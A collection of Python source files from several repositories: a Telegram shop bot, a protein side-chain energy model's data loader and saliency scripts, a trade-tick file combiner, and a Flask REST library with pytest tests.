elif message.text == "Игра 1":
bot.send_message(message.chat.id, "Пока не работает", reply_markup=markup_menu)
elif message.text == "Игра 2":
bot.send_message(message.chat.id, "Пока не работает", reply_markup=markup_menu)
elif message.text == "Игра 3":
bot.send_message(message.chat.id, "Пока не работает", reply_markup=markup_menu)
elif message.text == "⬅ Назад":
bot.send_message(message.chat.id, "И снова привет! Я супербот. Жми на кнопки", reply_markup=markup_menu)
else:
bot.send_message(message.chat.id, "Я пока не научился отвечать на это, жми кнопки!", reply_markup=markup_menu)
@bot.message_handler(func=lambda message: True, content_types=['location'])
def magazin_location(message):
lon = message.location.longitude
lat = message.location.latitude
distance = []
for m in const.MAGAZINS:
result = vincenty((m['latm'], m['lonm']), (lat, lon)).kilometers
distance.append(result)
index = distance.index(min(distance))
bot.send_message(message.chat.id, 'Ближайший к <NAME>!')
bot.send_venue(message.chat.id, const.MAGAZINS[index]['latm'], const.MAGAZINS[index]['lonm'],
const.MAGAZINS[index]['title'], const.MAGAZINS[index]['address'])
@bot.callback_query_handler(func=lambda call: True)
def call_back_payment(call):
if call.data == 'cash':
bot.send_message(call.message.chat.id, text="""
Наличная оплата, производится в рублях, в кассе магазина""", reply_markup=markup_inline_payment)
elif call.data == 'card':
bot.send_message(call.message.chat.id, text="""
Можно оплатить картой""", reply_markup=markup_inline_payment)
elif call.data == 'invoice':
bot.send_message(call.message.chat.id, text="""
Можно банковским переводом""", reply_markup=markup_inline_payment)
bot.polling()
``` |
{
"source": "johny65/wlv",
"score": 2
} |
#### File: johny65/wlv/setup.py
```python
import sys
from setuptools import find_packages, setup
def get_version():
version = open("version").read()
version = version.split("-")[0] if version.endswith("SNAPSHOT") else version
return version
setup(
name='wlv',
version=get_version(),
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=[
'flask',
],
)
if sys.argv[1] == "bdist_wheel":
print("Built version", get_version())
``` |
{
"source": "johnyang101/protein-ebm",
"score": 2
} |
#### File: johnyang101/protein-ebm/data.py
```python
import os
import os.path as osp
import pickle
import random
import numpy as np
from scipy.stats import special_ortho_group
import gemmi
import torch
from constants import test_rotamers
from math_utils import rotate_v1_v2
from mmcif_utils import (
compute_dihedral,
exhaustive_sample,
interpolated_sample_normal,
load_rotamor_library,
mixture_sample_normal,
parse_dense_format,
reencode_dense_format,
rotate_dihedral_fast,
)
from torch.utils.data import Dataset
from tqdm import tqdm
class MMCIFTransformer(Dataset):
def __init__(
self,
FLAGS,
mmcif_path="./mmcif",
split="train",
rank_idx=0,
world_size=1,
uniform=True,
weighted_gauss=False,
gmm=False,
chi_mean=False,
valid=False,
):
files = []
dirs = os.listdir(osp.join(mmcif_path, "mmCIF"))
self.split = split
self.so3 = special_ortho_group(3)
self.chi_mean = chi_mean
self.weighted_gauss = weighted_gauss
self.gmm = gmm
self.uniform = uniform
# Filter out proteins in test dataset
for d in tqdm(dirs):
directory = osp.join(mmcif_path, "mmCIF", d)
d_files = os.listdir(directory)
files_tmp = [osp.join(directory, d_file) for d_file in d_files if ".p" in d_file]
for f in files_tmp:
name = f.split("/")[-1]
name = name.split(".")[0]
if name in test_rotamers and self.split == "test":
files.append(f)
elif name not in test_rotamers and self.split in ["train", "val"]:
files.append(f)
self.files = files
if split in ["train", "val"]:
duplicate_seqs = set()
# Remove proteins in the train dataset that are too similar to the test dataset
with open(osp.join(mmcif_path, "duplicate_sequences.txt"), "r") as f:
for line in f:
duplicate_seqs.add(line.strip())
fids = set()
# Remove low resolution proteins
with open(
osp.join(mmcif_path, "cullpdb_pc90_res1.8_R0.25_d190807_chains14857"), "r"
) as f:
i = 0
for line in f:
if i is not 0:
fid = line.split()[0]
if fid not in duplicate_seqs:
fids.add(fid)
i += 1
files_new = []
alphabet = []
for letter in range(65, 91):
alphabet.append(chr(letter))
for f in files:
tup = (f.split("/")[-1]).split(".")
if int(tup[1]) >= len(alphabet):
continue
seq_id = tup[0].upper() + alphabet[int(tup[1])]
if seq_id in fids:
files_new.append(f)
self.files = files_new
elif split == "test":
fids = set()
# Remove low resolution proteins
with open(
osp.join(mmcif_path, "cullpdb_pc90_res1.8_R0.25_d190807_chains14857"), "r"
) as f:
i = 0
for line in f:
if i is not 0:
fid = line.split()[0]
fids.add(fid)
i += 1
files_new = []
alphabet = []
for letter in range(65, 91):
alphabet.append(chr(letter))
for f in files:
tup = (f.split("/")[-1]).split(".")
if int(tup[1]) >= len(alphabet):
continue
seq_id = tup[0].upper() + alphabet[int(tup[1])]
if seq_id in fids:
files_new.append(f)
self.files = files_new
chunksize = len(self.files) // world_size
n = len(self.files)
# Set up a validation dataset
if split == "train":
n = self.files[int(0.95 * n) :]
elif split == "val":
n = self.files[: int(0.95 * n)]
self.FLAGS = FLAGS
self.db = load_rotamor_library()
print(f"Loaded {len(self.files)} files for {split} dataset split")
self.split = split
def __len__(self):
return len(self.files)
def __getitem__(self, index, forward=False):
FLAGS = self.FLAGS
if FLAGS.single and not forward:
index = 0
FLAGS = self.FLAGS
pickle_file = self.files[index]
# node_embed: D x 6
(node_embed,) = pickle.load(open(pickle_file, "rb"))
node_embed_original = node_embed
# Remove proteins with small numbers of atoms
if node_embed.shape[0] < 20:
return self.__getitem__((index + 1) % len(self.files), forward=True)
# Remove invalid proteins
if (
node_embed.max(axis=0)[2] >= 21
or node_embed.max(axis=0)[0] >= 20
or node_embed.max(axis=0)[1] >= 5
):
return self.__getitem__((index + 1) % len(self.files), forward=True)
par, child, pos, pos_exist, res, chis_valid = parse_dense_format(node_embed)
if par is None:
return self.__getitem__((index + 1) % len(self.files), forward=True)
if len(res) < 5:
return self.__getitem__((index + 1) % len(self.files), forward=True)
angles = compute_dihedral(par, child, pos, pos_exist)
tries = 0
perm = np.random.permutation(np.arange(1, len(res) - 1))
select_idxs = []
while True:
# Randomly sample an amino acid that are not the first and last amino acid
idx = perm[tries]
if res[idx] == "gly" or res[idx] == "ala":
idx = random.randint(1, len(res) - 2)
else:
select_idxs.append(idx)
if len(select_idxs) == FLAGS.multisample:
break
tries += 1
if tries > 1000 or tries == perm.shape[0]:
return self.__getitem__((index + 1) % len(self.files), forward=True)
node_embeds = []
node_embeds_negatives = []
select_atom_idxs = []
select_atom_masks = []
select_chis_valids = []
select_ancestors = []
for idx in select_idxs:
neg_samples = []
gt_chis = [(angles[idx, 4:8], chis_valid[idx, :4])]
neg_chis = []
# Choose number of negative samples
if FLAGS.train and self.split in ["val", "test"]:
neg_sample = 150
else:
neg_sample = FLAGS.neg_sample
atom_idxs = []
atoms_mask = []
chis_valids = []
ancestors = []
if self.split == "test":
dist = np.sqrt(np.square(pos[idx : idx + 1, 2] - pos[:, 2]).sum(axis=1))
neighbors = (dist < 10).sum()
# Choose different tresholds of sampling dependent on whether an atom is dense
# or not
if neighbors < 24:
tresh = 0.95
else:
tresh = 0.98
if self.weighted_gauss:
chis_list = interpolated_sample_normal(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
neg_sample,
uniform=self.uniform,
)
elif self.gmm:
chis_list = mixture_sample_normal(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
neg_sample,
uniform=self.uniform,
)
else:
chis_list = exhaustive_sample(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
tresh=tresh,
chi_mean=self.chi_mean,
)
if len(chis_list) < neg_sample:
repeat = neg_sample // len(chis_list) + 1
chis_list = chis_list * repeat
random.shuffle(chis_list)
else:
dist = np.sqrt(np.square(pos[idx : idx + 1, 2] - pos[:, 2]).sum(axis=1))
neighbors = (dist < 10).sum()
if neighbors < 24:
tresh = 1.0
else:
tresh = 1.0
if self.weighted_gauss:
chis_list = interpolated_sample_normal(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
neg_sample,
uniform=self.uniform,
)
elif self.gmm:
chis_list = mixture_sample_normal(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
neg_sample,
uniform=self.uniform,
)
else:
chis_list = exhaustive_sample(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
tresh=tresh,
chi_mean=self.chi_mean,
)
if len(chis_list) < neg_sample:
repeat = neg_sample // len(chis_list) + 1
chis_list = chis_list * repeat
random.shuffle(chis_list)
for i in range(neg_sample):
chis_target = angles[:, 4:8].copy()
chis = chis_list[i]
chis_target[idx] = (
chis * chis_valid[idx, :4] + (1 - chis_valid[idx, :4]) * chis_target[idx]
)
pos_new = rotate_dihedral_fast(
angles, par, child, pos, pos_exist, chis_target, chis_valid, idx
)
node_neg_embed = reencode_dense_format(node_embed, pos_new, pos_exist)
neg_samples.append(node_neg_embed)
neg_chis.append((chis_target[idx], chis_valid[idx, :4]))
nelem = pos_exist[:idx].sum()
offset = pos_exist[idx].sum()
mask = np.zeros(20)
mask[:offset] = 1
atom_idxs.append(
np.concatenate(
[np.arange(nelem, nelem + offset), np.ones(20 - offset) * (nelem)]
)
)
atoms_mask.append(mask)
chis_valids.append(chis_valid[idx, :4].copy())
ancestors.append(np.stack([par[idx], child[idx]], axis=0))
node_embed_negative = np.array(neg_samples)
pos_chosen = pos[idx, 4]
atoms_mask = np.array(atoms_mask)
atom_idxs = np.array(atom_idxs)
chis_valids = np.array(chis_valids)
ancestors = np.array(ancestors)
# Choose the closest atoms to the chosen locaiton:
close_idx = np.argsort(np.square(node_embed[:, -3:] - pos_chosen).sum(axis=1))
node_embed_short = node_embed[close_idx[: FLAGS.max_size]].copy()
pos_chosen = pos_new[idx, 4]
close_idx_neg = np.argsort(
np.square(node_embed_negative[:, :, -3:] - pos_chosen).sum(axis=2), axis=1
)
# Compute the corresponding indices for atom_idxs
# Get the position of each index ik
pos_code = np.argsort(close_idx_neg, axis=1)
choose_idx = np.take_along_axis(pos_code, atom_idxs.astype(np.int32), axis=1)
if choose_idx.max() >= FLAGS.max_size:
return self.__getitem__((index + 1) % len(self.files), forward=True)
node_embed_negative = np.take_along_axis(
node_embed_negative, close_idx_neg[:, : FLAGS.max_size, None], axis=1
)
# Normalize each coordinate of node_embed to have x, y, z coordinate to be equal 0
node_embed_short[:, -3:] = node_embed_short[:, -3:] - np.mean(
node_embed_short[:, -3:], axis=0
)
node_embed_negative[:, :, -3:] = node_embed_negative[:, :, -3:] - np.mean(
node_embed_negative[:, :, -3:], axis=1, keepdims=True
)
if FLAGS.augment:
# Now rotate all elements
rot_matrix = self.so3.rvs(1)
node_embed_short[:, -3:] = np.matmul(node_embed_short[:, -3:], rot_matrix)
rot_matrix_neg = self.so3.rvs(node_embed_negative.shape[0])
node_embed_negative[:, :, -3:] = np.matmul(
node_embed_negative[:, :, -3:], rot_matrix_neg
)
# # Additionally scale values to be in the same scale
node_embed_short[:, -3:] = node_embed_short[:, -3:] / 10.0
node_embed_negative[:, :, -3:] = node_embed_negative[:, :, -3:] / 10.0
# Augment the data with random rotations
node_embed_short = torch.from_numpy(node_embed_short).float()
node_embed_negative = torch.from_numpy(node_embed_negative).float()
if self.split == "train":
node_embeds.append(node_embed_short)
node_embeds_negatives.append(node_embed_negative)
elif self.split in ["val", "test"]:
return node_embed_short, node_embed_negative, gt_chis, neg_chis, res[idx]
return node_embeds, node_embeds_negatives
def collate_fn_transformer(inp):
node_embed, node_embed_neg = zip(*inp)
node_embed, node_embed_neg = sum(node_embed, []), sum(node_embed_neg, [])
max_size = max([ne.size(0) for ne in node_embed])
neg_sample_size = node_embed_neg[0].size(0)
sizes = list(node_embed_neg[0].size())
node_embed_batch = torch.zeros(*(len(node_embed), max_size, node_embed[0].size(1)))
node_embed_neg_batch = (node_embed_batch.clone()[:, None, :, :]).repeat(1, sizes[0], 1, 1)
for i, (ne, neg) in enumerate(zip(node_embed, node_embed_neg)):
node_embed_batch[i, : ne.size(0), :] = ne
node_embed_neg_batch[i, :, : neg.size(1), :] = neg
sizes = list(node_embed_neg_batch.size())
node_embed_neg_batch = node_embed_neg_batch.view(-1, *sizes[2:])
return node_embed_batch, node_embed_neg_batch
def collate_fn_transformer_test(inp):
node_embed, node_embed_neg, gt_chis, neg_chis, res = zip(*inp)
max_size = max([ne.size(0) for ne in node_embed])
neg_sample_size = node_embed_neg[0].size(0)
sizes = list(node_embed_neg[0].size())
node_embed_batch = torch.zeros(*(len(node_embed), max_size, node_embed[0].size(1)))
node_embed_neg_batch = (node_embed_batch.clone()[:, None, :, :]).repeat(1, sizes[0], 1, 1)
for i, (ne, neg) in enumerate(zip(node_embed, node_embed_neg)):
node_embed_batch[i, : ne.size(0), :] = ne
node_embed_neg_batch[i, :, : neg.size(1), :] = neg
sizes = list(node_embed_neg_batch.size())
node_embed_neg_batch = node_embed_neg_batch.view(-1, *sizes[2:])
return node_embed_batch, node_embed_neg_batch, gt_chis, neg_chis, res
```
#### File: protein-ebm/scripts/extract_saliency.py
```python
import argparse
import collections
import pathlib
import pickle
import numpy as np
import models
import torch
from config import MMCIF_PATH
def _construct_residue_atom_indices(node_embed, pos, pos_exist):
"""Dirty nonsense to get a (residue_index, atom_index) pair for each element
in node_embed."""
def _hash(vec3):
return (vec3[0], vec3[1], vec3[2])
vec_to_indices = {}
for residue_index in range(pos.shape[0]):
for atom_index in range(pos.shape[1]):
if not pos_exist[residue_index, atom_index]:
continue
pos_chosen = pos[residue_index, atom_index]
vec_to_indices[_hash(pos_chosen)] = (residue_index, atom_index)
residue_and_atom_indices = -np.ones((node_embed.shape[0], 2), dtype=np.int64)
for idx in range(0, node_embed.shape[0]):
node_embed_pos = node_embed[idx, -3:] # 3-dim
residue_and_atom_indices[idx] = np.array(
list(vec_to_indices[_hash(node_embed_pos)]), dtype=np.int64
)
return residue_and_atom_indices
def attention_vis(args, model, node_embed, pos, pos_exist):
"""Main function to visualize attention maps around each residue."""
residue_and_atom_indices = _construct_residue_atom_indices(node_embed, pos, pos_exist)
results = collections.OrderedDict()
for idx in range(pos.shape[0]):
for center_atom in list(range(5)):
# sort the atoms by how far away they are
# sort key is the first atom on the sidechain
pos_chosen = pos[idx, center_atom]
close_idx = np.argsort(np.square(node_embed[:, -3:] - pos_chosen).sum(axis=1))
close_idx = close_idx[: args.max_size]
# Grab the 64 closest atoms
node_embed_short = node_embed[close_idx].copy()
close_residue_and_atom_indices = residue_and_atom_indices[close_idx].copy()
# Normalize each coordinate of node_embed to have x, y, z coordinate to be equal 0
node_embed_short[:, -3:] = node_embed_short[:, -3:] - np.mean(
node_embed_short[:, -3:], axis=0
)
# Torch-ify & enable grads
node_embed_short = node_embed_short[np.newaxis, :, :]
node_embed_short = torch.from_numpy(node_embed_short).float().cuda()
node_embed_short.requires_grad = True
with torch.autograd.enable_grad():
energy = model(node_embed_short)
energy_sum = energy.sum()
node_embed_short_grad = torch.autograd.grad([energy_sum], [node_embed_short])[0]
node_embed_short_grad = node_embed_short_grad[:, :, -3:].detach().cpu().numpy()
assert node_embed_short_grad.shape[0] == 1
grad_norms = np.linalg.norm(node_embed_short_grad[0], axis=1)
result = {
"center_position": np.array([idx, center_atom], dtype=np.int64),
"viewport_grad_norms": grad_norms,
"viewport_positions": close_residue_and_atom_indices,
}
results[(idx, center_atom)] = result
return results
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--pdb_name", type=str, required=True)
parser.add_argument("--results_file", type=pathlib.Path, required=True)
parser.add_argument("--model_file", type=pathlib.Path, default=None)
parser.add_argument(
"--cache_dir",
type=pathlib.Path,
default=pathlib.Path(MMCIF_PATH + "/mmCIF/"),
)
# Transformer arguments
parser.add_argument(
"--encoder_layers",
type=int,
default=6,
help="number of layers to apply the transformer on",
)
parser.add_argument("--dropout", type=float, default=0.0, help="chance of dropping out a unit")
parser.add_argument(
"--relu_dropout", type=float, default=0.0, help="chance of dropping out a relu unit"
)
parser.add_argument(
"--encoder_normalize_after",
action="store_false",
dest="encoder_normalize_before",
help="whether to normalize outputs before",
)
parser.add_argument(
"--encoder_attention_heads",
type=int,
default=8,
help="number of heads of attention to use",
)
parser.add_argument(
"--attention_dropout", type=float, default=0.0, help="dropout rate of attention"
)
parser.add_argument(
"--encoder_ffn_embed_dim",
type=int,
default=1024,
help="hidden dimension to use in transformer",
)
parser.add_argument(
"--encoder_embed_dim", type=int, default=256, help="original embed dimension of element"
)
parser.add_argument("--max_size", type=int, default=64, help="maximum size of time series")
return parser
def main(args):
model = models.RotomerTransformerModel(args)
model = model.cuda()
model = model.eval()
if args.model_file is not None:
checkpoint = torch.load(args.model_file)
model_state_dict = {
k.replace("module.", ""): v for k, v in checkpoint["model_state_dict"].items()
}
model.load_state_dict(model_state_dict)
cache_file = args.cache_dir / args.pdb_name[1:3] / f"{args.pdb_name}.cache"
with open(cache_file, "rb") as infile:
node_embed, par, child, pos, pos_exist, res, chis_valid, angles = pickle.load(infile)
viewport_results = attention_vis(args, model, node_embed, pos, pos_exist)
with open(args.results_file, "wb") as outfile:
pickle.dump({
"viewports": viewport_results,
"residues": res,
}, outfile)
if __name__ == "__main__":
parser = create_parser()
args = parser.parse_args()
main(args)
```
#### File: protein-ebm/scripts/generate_colormap_saliency.py
```python
import argparse
import pathlib
import pickle
import numpy as np
import amino_acid_config
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--results_file", type=pathlib.Path, required=True)
parser.add_argument("--color_file", type=pathlib.Path, required=True)
parser.add_argument("--viewport_center_res", type=int, required=True)
parser.add_argument("--viewport_center_atom", type=int, required=True)
return parser
def to_atom_name(res, atom_idx):
return amino_acid_config.res_atoms[res.upper()][atom_idx]
def intensity_to_color(intensity):
assert 0 <= intensity <= 1
return 1.0, (1.0 - intensity) * 0.8, (1.0 - intensity) * 0.8
def main(args):
with open(args.results_file, "rb") as infile:
results = pickle.load(infile)
viewports = results["viewports"]
residues = results["residues"]
viewport = viewports[args.viewport_center_res, args.viewport_center_atom]
norms = viewport["viewport_grad_norms"]
maxnorm = norms.max()
residue_and_atom_indices = viewport["viewport_positions"]
assert norms.shape[0] == residue_and_atom_indices.shape[0]
center_residue_index, center_atom_index = viewport["center_position"]
ordered_residues = np.argsort(norms)
rankings = np.zeros(len(norms))
rankings[ordered_residues] = np.arange(len(norms)) + 1
intensities = rankings / len(norms)
intensities = intensities ** 5.0
with open(args.color_file, "w") as outfile:
for i, intensity in enumerate(intensities):
residue_index, atom_index = residue_and_atom_indices[i]
atom_name = to_atom_name(residues[residue_index], atom_index)
r, g, b = intensity_to_color(intensity)
if residue_index == center_residue_index and atom_index >= 4:
g, r, b = r, g, b
print(residue_index, atom_name, r, g, b, sep=",", file=outfile)
if __name__ == "__main__":
parser = create_parser()
args = parser.parse_args()
main(args)
``` |
{
"source": "john-yan/SierraChartUtilities",
"score": 3
} |
#### File: john-yan/SierraChartUtilities/run-combine-ticks.py
```python
import argparse
from select import select
import re, json
from functools import reduce
from time import sleep
from utilities import follow
import math
trade_header = "DateTime,Price,Volume,AtBidOrAsk\n"
trade_format = '%.1f,%.2f,%.1f,%.1f\n'
def RemoveLastSecondTrades(data):
if len(data) == 0:
return data
# remove the last second
last_second = data[-1][0]
while True:
if data[-1][0] == last_second:
del data[-1]
else:
break
return data
def ReadFile(f):
header = f.readline()
assert(header == trade_header)
data = []
for line in f:
values = line.rstrip().split(',')
dt = float(values[0])
price = float(values[1])
volume = float(values[2])
at_bid_or_ask = float(values[3])
data.append((dt, price, volume, at_bid_or_ask))
return data
def AppendTrades(data, new_trades):
if len(data) == 0:
return new_trades
last_second = data[-1][0]
index = 0
for index in range(0, len(new_trades)):
if new_trades[index][0] > last_second:
break
data.append(new_trades[index:])
return data
def ProcessFiles(infiles, outfile, follow_mode):
trades = []
for f in infiles[:-1]:
new_trades = ReadFile(f)
new_trades = RemoveLastSecondTrades(new_trades)
trades = AppendTrades(trades, new_trades)
# output all data up to now
outfile.write(trade_header)
for trade in trades:
outfile.write(trade_format % trade)
assert(len(trades) > 0)
last_second = trades[-1][0]
del trades
header = infiles[-1].readline()
assert(header == trade_header)
read_from = infiles[-1]
if follow_mode:
read_from = follow(infiles[-1], 10)
for line in read_from:
values = line.rstrip().split(',')
if int(values[0]) > last_second:
outfile.write(line)
break
for line in read_from:
outfile.write(line)
outfile.flush()
def Main():
parser = argparse.ArgumentParser()
parser.add_argument('--inputs', '-i', required=True, help="input csv files")
parser.add_argument('--output', '-o', required=True, help="output csv file")
parser.add_argument('--follow', '-f', default=False, action='store_true', help="Do we follow the input file?")
args = parser.parse_args()
filenames = args.inputs.split(',')
files = []
for fn in filenames:
files.append(open(fn, 'r'))
assert(files[-1])
outfile = open(args.output, 'w')
if not outfile:
print('Unable to open output file: ', outfile)
exit(-1)
ProcessFiles(files, outfile, args.follow)
if __name__ == '__main__':
Main()
``` |
{
"source": "johny-b/blargh",
"score": 2
} |
#### File: api/flask/resource.py
```python
from flask import request
from flask_restful import Resource as FRResource, reqparse
from blargh.engine import Engine
import json
class Resource(FRResource):
model = None
def get(self, id_=None, auth=None):
args = self._get_args()
kwargs = {
'auth': auth,
'depth': args['depth'],
'limit': args['limit'],
'filter_': {},
}
if args['filter']:
try:
kwargs['filter_'] = json.loads(args['filter'])
except json.decoder.JSONDecodeError:
return {'msg': 'Filter is not a valid json'}, 400, {}
if args['sort']:
try:
kwargs['sort'] = json.loads(args['sort'])
except json.decoder.JSONDecodeError:
return {'msg': 'sort is not a valid json'}, 400, {}
data, status = Engine.get(self.model.name, id_, **kwargs)
return data, status, {}
def delete(self, id_, auth=None):
data, status = Engine.delete(self.model.name, id_, auth=auth)
return data, status, {}
def post(self, auth=None):
data, status = Engine.post(self.model.name, request.get_json(), auth=auth)
return data, status, {}
def put(self, id_, auth=None):
data, status = Engine.put(self.model.name, id_, request.get_json(), auth=auth)
return data, status, {}
def patch(self, id_, auth=None):
data, status = Engine.patch(self.model.name, id_, request.get_json(), auth=auth)
return data, status, {}
def _get_args(self):
parser = reqparse.RequestParser()
parser.add_argument('depth', type=int, default=1, location='args')
parser.add_argument('filter', type=str, default='', location='args')
parser.add_argument('limit', type=int, location='args')
parser.add_argument('sort', type=str, location='args')
return parser.parse_args(strict=False)
```
#### File: example/cookies/__init__.py
```python
from .data_model import dm
from . import create
from .pg_schema import pg_schema_sql
def world_data(storage_name):
if storage_name in ['DictStorage', 'PickledDictStorage']:
return {
'jar': {1: {'id': 1, 'cookies': [1, 2]},
2: {'id': 2, 'cookies': [3]}},
'cookie': {1: {'id': 1, 'jar': 1, 'type': 'biscuit'},
2: {'id': 2, 'jar': 1, 'type': 'muffin'},
3: {'id': 3, 'jar': 2, 'type': 'shortbread'}}}
elif storage_name == 'PGStorage':
return {
'jar': [(1,), (2,)],
'cookie': [(1, 1, 'biscuit'),
(2, 1, 'muffin'),
(3, 2, 'shortbread')]}
raise Exception("Unknown data for storage {}".format(storage_name))
```
#### File: auth/pg_storage_user_id/test_user_id_delete.py
```python
import pytest
from tests.auth.pg_storage_user_id.helpers import init_cookies_with_user_id
##############
# DELETE #
##############
@pytest.mark.parametrize("user_id, resource, id_, expected_status", (
(1, 'cookie', 1, 200),
(1, 'cookie', 2, 200),
(1, 'cookie', 3, 404),
(2, 'cookie', 1, 404),
(2, 'cookie', 2, 404),
(2, 'cookie', 3, 200),
(1, 'jar', 1, 200),
(1, 'jar', 2, 404),
(2, 'jar', 1, 404),
(2, 'jar', 2, 200),
))
def test_delete(get_client, user_id, resource, id_, expected_status):
'''
Test if DELETE on object returns correct status
'''
init_cookies_with_user_id()
client = get_client(auth_required=True)
client.login({'user_id': user_id})
data, status, headers = client.delete(resource, id_)
assert status == expected_status
```
#### File: tests/pg_storage/test_custom_query.py
```python
from example import cookies
from tests.helpers.blargh_config import init_pg_world
import pytest
from copy import deepcopy
from blargh import engine
from blargh import exceptions
from blargh.data_model.fields import Scalar, Rel
# USED BY BOTH
def set_query_class(query_cls):
'''
Make tester use CLS as query
'''
def wrap_storage(f):
def wrapped_storage(*args, **kwargs):
old_storage = f(*args, **kwargs)
new_storage = engine.PGStorage(old_storage._conn, old_storage._schema, query_cls=query_cls)
return new_storage
return wrapped_storage
engine.config._config['create_storage'] = wrap_storage(engine.config._config['create_storage'])
# WITH SHELF
shelf_select = '''
WITH
values (id, position) AS (
VALUES (1, 'top'), (2, 'bottom')
)
SELECT *
FROM values
'''
class ReadonlyResource(exceptions.e400):
code = 'resource_is_readonly'
# expected error message
shelf_is_readonly = {'error': {'code': 'RESOURCE_IS_READONLY', 'details': {'object_name': 'shelf'}}}
class WithShelf(engine.storage.pg.Query):
def table_columns(self, name):
if name == 'shelf':
return ('id', 'position')
return super().table_columns(name)
def _select_all_sql(self, name):
if name == 'shelf':
return shelf_select
return super()._select_all_sql(name)
# NOTE: upsert/delete are not necesary (this will raise e400 either way),
# but this way it is clearer
def upsert(self, name, data):
if name == 'shelf':
raise ReadonlyResource(object_name='shelf')
return super().upsert(name, data)
def delete(self, name, pkey_val):
if name == 'shelf':
raise ReadonlyResource(object_name='shelf')
return super().upsert(name, pkey_val)
def default_pkey_expr(self, name, column_name):
if name == 'shelf':
raise ReadonlyResource(object_name='shelf')
return super().default_pkey_expr(name, column_name)
def init_cookies_with_shelf():
# 1. Change data model
dm = deepcopy(cookies.dm)
shelf = dm.create_object('shelf')
shelf.add_field(Scalar('id', pkey=True, type_=int))
shelf.add_field(Scalar('position', pkey=False))
jar = dm.object('jar')
shelf.add_field(Rel('jars', stores=jar, multi=True))
dm.object('jar').add_field(Rel('shelf', stores=shelf, multi=False))
dm.connect(shelf, 'jars', jar, 'shelf')
# 2. Init world
init_pg_world(dm)
# 3. Modify jar table,
conn = engine.world().storage._conn
conn.cursor().execute('''
ALTER TABLE jar ADD COLUMN shelf integer CHECK (shelf IN (1, 2))
''')
conn.commit()
# 4. Set new class
set_query_class(WithShelf)
@pytest.mark.parametrize("method, expected_status, args, kwargs, expected_data", (
# GET should work as usual
('get', 200, ('shelf',), {}, [{'id': 1, 'position': 'top', 'jars': []},
{'id': 2, 'position': 'bottom', 'jars': []}]),
('get', 200, ('shelf',), dict(depth=0), [1, 2]),
('get', 200, ('shelf', 2), {}, {'id': 2, 'position': 'bottom', 'jars': []}),
('get', 200, ('shelf',), dict(filter_={'position': 'top'}), [{'id': 1, 'position': 'top', 'jars': []}]),
('get', 400, ('shelf',), dict(filter_={'jars': []}), None), # no searching by multi rel fields
# PATCHing shelf/jar relation is allowed in both ways
('patch', 200, ('jar', 1, {'shelf': 1}), {}, {'id': 1, 'cookies': [1, 2], 'shelf': 1}),
('patch', 200, ('shelf', 1, {'jars': [1, 2]}), {}, {'id': 1, 'position': 'top', 'jars': [1, 2]}),
# POSTING fresh jars on shelves is also possible in both ways
('post', 201, ('jar', {'shelf': 1}), {}, {'id': 3, 'cookies': [], 'shelf': 1}),
('patch', 200, ('shelf', 2, {'jars': [{}, {}]}), {}, {'id': 2, 'position': 'bottom', 'jars': [3, 4]}),
# PUTing jars is fine as well
('put', 201, ('jar', 3, {'shelf': 2}), {}, {'id': 3, 'cookies': [], 'shelf': 2}),
# POST/PUT/DELETE/PATCH on "stored" shelf field are not allowed
('patch', 400, ('shelf', 1, {'position': 'middle'}), {}, shelf_is_readonly),
('post', 400, ('shelf', {'position': 'middle'}), {}, shelf_is_readonly),
('put', 400, ('shelf', 1, {'position': 'middle'}), {}, shelf_is_readonly),
('put', 400, ('shelf', 3, {'position': 'middle'}), {}, shelf_is_readonly),
('delete', 400, ('shelf', 1), {}, shelf_is_readonly),
('delete', 404, ('shelf', 4), {}, None), # 404 goes first
))
def test_shelf_1(get_client, method, expected_status, args, kwargs, expected_data):
'''
Test "simple" shelf case - always starting from basic cookies situation,
test_shelf_2 tests jars already on shelves
'''
init_cookies_with_shelf()
client = get_client()
data, status, headers = getattr(client, method)(*args, **kwargs)
assert status == expected_status
if expected_data is not None:
assert data == expected_data
@pytest.mark.parametrize("method, expected_status, args, kwargs, expected_data", (
# GET
('get', 200, ('shelf',), {}, [{'id': 1, 'position': 'top', 'jars': [1]},
{'id': 2, 'position': 'bottom', 'jars': [2]}]),
('get', 200, ('shelf', 1), dict(depth=2),
{'id': 1, 'position': 'top', 'jars': [{'id': 1, 'cookies': [1, 2], 'shelf': 1}]}),
# Add another jar to shelf
('patch', 200, ('shelf', 1, {'jars': [1, {}]}), {}, {'id': 1, 'position': 'top', 'jars': [1, 3]}),
# Remove jar
('patch', 200, ('shelf', 1, {'jars': []}), {}, {'id': 1, 'position': 'top', 'jars': []}),
('patch', 200, ('jar', 2, {'shelf': None}), {}, {'id': 2, 'cookies': [3]}),
))
def test_shelf_2(get_client, method, expected_status, args, kwargs, expected_data):
'''
Test with jars already on shelves
'''
init_cookies_with_shelf()
client = get_client()
# Put jars on shelves
assert client.patch('jar', 1, {'shelf': 1})[1] == 200
assert client.patch('jar', 2, {'shelf': 2})[1] == 200
# Test
data, status, headers = getattr(client, method)(*args, **kwargs)
assert status == expected_status
if expected_data is not None:
assert data == expected_data
# # ONLY DONUTS
# not_a_donut = "THIS IS NOT A DONUT!!!"
# class OnlyDonuts(engine.storage.pg.Query):
# def upsert(self, name, data):
# if 'type' in data and data['type'] != 'donut':
# raise exceptions.e400(not_a_donut)
# return super().upsert(name, data)
#
#
# @pytest.mark.parametrize("method, expected_status, args", (
# ('post', 201, ('cookie', {'type': 'donut'})),
# ('post', 400, ('cookie', {'type': 'not_a_donut'})),
# ('post', 201, ('jar', {'cookies': [{}, {}]})),
# ('post', 201, ('jar', {'cookies': [{'type': 'donut'}, {'type': 'donut'}, {}]})),
# ('post', 400, ('jar', {'cookies': [{'type': 'donut'}, {'type': 'not_a_donut'}, {}]})),
# ('patch', 200, ('cookie', 1, {'type': 'donut'})),
# ('patch', 400, ('cookie', 1, {'type': 'not_a_donut'})),
# ))
# def test_only_donuts(get_client, method, expected_status, args):
# init_pg_world(cookies.dm)
# client = get_client()
# set_query_class(OnlyDonuts)
#
# data, status, headers = getattr(client, method)(*args)
#
